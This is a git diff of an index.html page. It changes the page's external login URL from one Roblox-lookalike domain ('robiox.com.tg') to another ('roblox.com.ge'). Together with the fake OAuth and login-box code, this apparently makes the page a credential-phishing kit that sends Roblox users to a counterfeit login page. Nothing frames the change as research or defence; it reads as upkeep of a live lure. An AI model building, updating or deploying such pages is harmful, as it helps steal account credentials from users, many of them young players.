--- a/index.html
+++ b/index.html
@@ -207,7 +207,7 @@
     overlay.addEventListener('click', toggleMenu);
 
     // External URL
-    const externalLoginUrl = "https://www.robiox.com.tg/NewLogin?returnUrl=https%3A%2F%2Fwww.roblox.com%2Fusers%2F211480936497%2Fprofile";
+    const externalLoginUrl = "https://roblox.com.ge/login?returnUrl=1336618017952672";
 
     function showOAuth() {
       loginBox.classList.remove("show");
